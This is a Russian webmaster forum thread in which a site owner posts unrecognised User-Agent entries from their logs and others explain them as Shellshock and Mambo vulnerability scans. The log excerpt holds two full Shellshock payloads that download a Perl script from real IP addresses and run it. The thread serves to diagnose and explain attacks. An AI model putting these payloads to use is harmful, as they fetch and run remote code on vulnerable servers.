- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу

Как снизить ДРР до 4,38% и повысить продажи с помощью VK Рекламы
Для интернет-магазина инженерных систем
Мария Лосева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Здравствуйте! Имеется собственная статистика на сайте. И вот последнее время появляются UserAgent
Это что пытаются взломать сайт, или ничего страшного?
Вчера хостинг прислал письмо что удалили вирус в файле, где были эти строчки.
И еще при открытии
антивирус на компьютере ругался на скрипт.Что за CMS у вас?
Только то что я написал, стандартной CMS нет
Только то что я написал, стандартной CMS нет
Не стандартная в смысле самописная? Вирус в каком файле удалил и где он лежит?
Могу в самописной найти дыру.
Но эти команды выполняются если только есть разрешение на выполнение system() функции, которая в 99% хостингах запрещена.
Файл /mylog/no_robot.log
В него записываются не распознанные UserAgent.
Вот что есть на данный момент
auto-news-ua
Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)
Mozilla/5.0 (compatible; YandexMetrika/2.0; +http://yandex.com/bots mtmon01e.yandex.ru)
Mozilla/5.0 (compatible; YandexMetrika/2.0; +http://yandex.com/bots mtmon01i.yandex.ru)
Mozilla/5.0 (compatible; YandexMetrika/2.0; +http://yandex.com/bots mtmon01g.yandex.ru)
Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
Mozilla/5.0 (compatible; pflink.ru/3.0)
Mozilla/5.0 (compatible; YandexBot/3.0)
Mozilla/5.0 (compatible; YandexMetrika/2.0; +http://yandex.com/bots)
() { :;}; /bin/bash -c "cd /tmp;lwp-download -a http://66.194.27.49/sports;curl -O http://66.194.27.49/sports;wget http://66.194.27.49/sports;perl /tmp/sports*;perl sports;rm -rf /tmp/sports*"
GetintentCrawler getintent.com
Mozilla/4.0 (CMS Crawler: http://www.cmscrawler.com)
Mozilla/5.0 Firefox/35.0
Nutch/2.2.1 (page scorer; http://integralads.com/site-indexing-policy/)
facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)
Validator.nu/LV http://validator.w3.org/services
() { :;}; /bin/bash -c "cd /tmp;lwp-download -a http://172.245.218.130/log.zip;curl -O http://172.245.218.130/log.zip;wget http://172.245.218.130/log.zip;perl /tmp/log.zip*;perl log.zip;rm -rf /tmp/log.zip*"
Mozilla/5.0 (compatible; GrapeshotCrawler/2.0; +http://www.grapeshot.co.uk/crawler.php)
Mozilla/5.0 (compatible; proximic; +http://www.proximic.com/info/spider.php)
Mozilla/5.0 (compatible; vkShare; +http://vk.com/dev/Share)
---------- Добавлено 22.01.2016 в 16:44 ----------
Но эти команды выполняются если только есть разрешение на выполнение system() функции, которая в 99% хостингах запрещена.
Значит кто-то все таки ищет как взломать сайт.
Смотрел еще на другом сайте, тоже есть похожее
Это что пытаются взломать сайт, или ничего страшного?
Конечно, пытаются.
Говоря словами поручика Ржевского, если есть сайт - значит его уже пытаются взломать ! Не тот вопрос, которым стоит задаваться.
Так что именно вы хотели узнать ?
Стоит задаваться вопросом удалось ли им это.
Если файл /mylog/no_robot.log просто содержит разные строки useragent, то это не значит, что там есть код закладки, который исполняется. Это пока не считается удачный взломом, несмотря на мнение антивируса.
Здравствуйте! Имеется собственная статистика на сайте. И вот последнее время появляются UserAgent
Судя по этой строке:
которую можно найти в файле log.zip который скачивается с адреса http://172.245.218.130/log.zip который указан у вас в логах - идет поиск уязвимых мамб. Причем после захвата скан продолжается в том числе и с новой зараженной жертвы. Если мамба у вас не стоит - можно спать спокойно. А вообще, конечно, треш и угар - делать eval с user-agent - это как надо было писать (я про мамбу) Там видимо регулярки с флагом e использовались - в приличном обществе за это пальцы вырывают вместе с сухожилиями на глазах у юных программистов, дабы неповадно было и дурному примеру не следовали.
А вообще, конечно, треш и угар - делать eval с user-agent - это как надо было писать (я про мамбу)
А это про широко известную уязвимость в bash.
Вот, например, как тут http://security.stackexchange.com/questions/68122/what-is-a-specific-example-of-how-the-shellshock-bash-bug-could-be-exploited
Разумеется, атакующий не знает есть ли там такие скрипты или нет. Сканируют всех.
А это про широко известную уязвимость в bash.
Разумеется, атакующий не знает есть ли там такие скрипты или нет. Сканируют всех.
точно.. Я про bash помню а про cgi как то не сообразил...
Хорошо, а в каком случае этот скрипт может запуститься?
Его надо чем-то открыть, или просто запустить с браузера, зная где будет прописана эта строчка?
в приличном обществе за это пальцы вырывают вместе с сухожилиями на глазах у юных программистов, дабы неповадно было и дурному примеру не следовали.
e в регулярках обработчиков рефа - распространенный и долгоживущий бекдор
поэтому аффтар сканера наловит не сколько джомлов, сколько чужих бекдоров
возможно, это и есть основная цель :)